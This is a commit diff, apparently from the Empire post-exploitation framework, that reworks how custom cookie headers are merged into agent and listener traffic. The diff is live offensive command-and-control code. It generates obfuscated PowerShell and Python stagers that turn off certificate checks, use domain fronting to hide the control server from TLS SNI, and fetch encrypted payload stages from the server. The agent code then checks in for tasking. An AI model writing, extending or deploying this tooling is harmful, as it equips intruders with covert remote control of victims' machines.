Fix for 1142 complete
chris
parent
516a7d8c1b
commit
f9018fc637
|
|
@ -140,7 +140,6 @@ function Invoke-Empire {
|
|||
# keep track of all background jobs
|
||||
# format: {'RandomJobName' : @{'Alias'=$RandName; 'AppDomain'=$AppDomain; 'PSHost'=$PSHost; 'Job'=$Job; 'Buffer'=$Buffer}, ... }
|
||||
$Script:Jobs = @{}
|
||||
$Script:Downloads = @{}
|
||||
# the currently imported script held in memory
|
||||
$script:ImportedScript = ''
|
||||
|
||||
|
|
|
|||
|
|
@ -111,14 +111,17 @@ function Start-Negotiate {
|
|||
if ($customHeaders -ne "") {
|
||||
$headers = $customHeaders -split ',';
|
||||
$headers | ForEach-Object {
|
||||
$headerKey = $_.split(':')[0];
|
||||
$headerValue = $_.split(':')[1];
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{}};
|
||||
$headerKey = $($_ -split ':')[0];
|
||||
$headerValue = $($_ -split ':')[1];
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{};
|
||||
}
|
||||
|
||||
$wc.Headers.Add($headerKey, $headerValue);
|
||||
}
|
||||
|
||||
}
|
||||
$wc.Headers.Add("User-Agent",$UA);
|
||||
|
||||
|
|
@ -214,10 +217,12 @@ function Start-Negotiate {
|
|||
$headers | ForEach-Object {
|
||||
$headerKey = $_.split(':')[0];
|
||||
$headerValue = $_.split(':')[1];
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{}};
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{};
|
||||
}
|
||||
|
||||
$wc.Headers.Add($headerKey, $headerValue);
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -286,7 +286,7 @@ class Listener:
|
|||
|
||||
if language.startswith('po'):
|
||||
# PowerShell
|
||||
|
||||
|
||||
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
|
||||
if safeChecks.lower() == 'true':
|
||||
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||
|
|
@ -334,13 +334,9 @@ class Listener:
|
|||
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
|
||||
|
||||
if userAgent.lower() != 'none':
|
||||
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
|
||||
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
|
||||
stager += "'User-Agent',$u);"
|
||||
|
||||
if userAgent.lower() != 'none':
|
||||
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
|
||||
stager += "'User-Agent',$u);"
|
||||
|
||||
if proxy.lower() != 'none':
|
||||
if proxy.lower() == 'default':
|
||||
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
|
||||
|
|
@ -393,6 +389,7 @@ class Listener:
|
|||
b64RoutingPacket = base64.b64encode(routingPacket)
|
||||
|
||||
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
|
||||
cookieString = "{}={};".format(cookie, b64RoutingPacket)
|
||||
|
||||
#Add custom headers if any
|
||||
if customHeaders != []:
|
||||
|
|
@ -404,12 +401,16 @@ class Listener:
|
|||
if headerKey.lower() == "host":
|
||||
stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};")
|
||||
|
||||
if headerKey.lower() == "cookie":
|
||||
cookieString += "{};".format(headerValue)
|
||||
continue
|
||||
|
||||
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
|
||||
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
|
||||
|
||||
# add the RC4 packet to a cookie
|
||||
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
|
||||
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket)
|
||||
stager += "\"Cookie\",\"%s\");" % (cookieString)
|
||||
|
||||
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);")
|
||||
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
|
||||
|
|
@ -461,15 +462,23 @@ class Listener:
|
|||
launcherBase += "req=urllib2.Request(server+t);\n"
|
||||
# add the RC4 packet to a cookie
|
||||
launcherBase += "req.add_header('User-Agent',UA);\n"
|
||||
launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket)
|
||||
cookieString = "{}={};".format(cookie,b64RoutingPacket)
|
||||
|
||||
|
||||
# Add custom headers if any
|
||||
if customHeaders != []:
|
||||
for header in customHeaders:
|
||||
headerKey = header.split(':')[0]
|
||||
headerValue = header.split(':')[1]
|
||||
|
||||
if headerKey.lower() == "cookie":
|
||||
cookieString += "{};".format(headerValue)
|
||||
continue
|
||||
|
||||
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
|
||||
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
|
||||
|
||||
launcherBase += "req.add_header('Cookie',\"%s\");\n" % (cookieString)
|
||||
|
||||
|
||||
if proxy.lower() != "none":
|
||||
|
|
@ -722,6 +731,20 @@ class Listener:
|
|||
This is so agents can easily be dynamically updated for the new listener.
|
||||
"""
|
||||
|
||||
profile = listenerOptions['DefaultProfile']['Value']
|
||||
customHeaders = profile.split('|')[2:]
|
||||
cookieString = ""
|
||||
|
||||
if customHeaders != []:
|
||||
for header in customHeaders:
|
||||
headerKey = header.split(':')[0]
|
||||
headerValue = header.split(':')[1]
|
||||
|
||||
if headerKey.lower() == "cookie":
|
||||
cookieString += "{};".format(headerValue)
|
||||
|
||||
|
||||
|
||||
if language:
|
||||
if language.lower() == 'powershell':
|
||||
|
||||
|
|
@ -743,6 +766,13 @@ class Listener:
|
|||
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
|
||||
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
|
||||
|
||||
#if there is an additional custom cookie value, add it to the webclient object.
|
||||
if($script:Headers['Cookie'] -ne $null) {
|
||||
$cookieValueString = "$RoutingCookie;$($script:Headers['Cookie']);"
|
||||
}
|
||||
else {
|
||||
$cookieValueString = $RoutingCookie
|
||||
}
|
||||
# build the web request object
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
|
||||
|
||||
|
|
@ -755,8 +785,9 @@ class Listener:
|
|||
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent)
|
||||
$script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + cookie + """=$RoutingCookie")
|
||||
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Cookie",\"""" + cookie + """=$cookieValueString")
|
||||
|
||||
|
||||
# choose a random valid URI for checkin
|
||||
$taskURI = $script:TaskURIs | Get-Random
|
||||
$result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
|
||||
|
|
@ -797,7 +828,6 @@ class Listener:
|
|||
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
|
||||
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
|
||||
|
||||
try {
|
||||
# get a random posting URI
|
||||
$taskURI = $Script:TaskURIs | Get-Random
|
||||
|
|
@ -814,7 +844,7 @@ class Listener:
|
|||
}
|
||||
}
|
||||
"""
|
||||
|
||||
|
||||
return updateServers + getTask + sendMessage
|
||||
|
||||
elif language.lower() == 'python':
|
||||
|
|
@ -847,7 +877,7 @@ def send_message(packets=None):
|
|||
# meta TASKING_REQUEST = 4
|
||||
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
|
||||
b64routingPacket = base64.b64encode(routingPacket)
|
||||
headers['Cookie'] = \"""" + cookie + """=%s" % (b64routingPacket)
|
||||
headers['Cookie'] = \"""" + cookie + """=%s;{}" % (b64routingPacket)
|
||||
|
||||
taskURI = random.sample(taskURIs, 1)[0]
|
||||
requestUri = server + taskURI
|
||||
|
|
@ -861,7 +891,7 @@ def send_message(packets=None):
|
|||
missedCheckins = missedCheckins + 1
|
||||
#if signaled for restaging, exit.
|
||||
if HTTPError.code == 401:
|
||||
sys.exit(0)
|
||||
pass
|
||||
|
||||
return (HTTPError.code, '')
|
||||
|
||||
|
|
@ -871,7 +901,7 @@ def send_message(packets=None):
|
|||
return (URLerror.reason, '')
|
||||
|
||||
return ('', '')
|
||||
"""
|
||||
""".format(cookieString)
|
||||
return updateServers + sendMessage
|
||||
|
||||
else:
|
||||
|
|
|
|||
Loading…
Reference in New Issue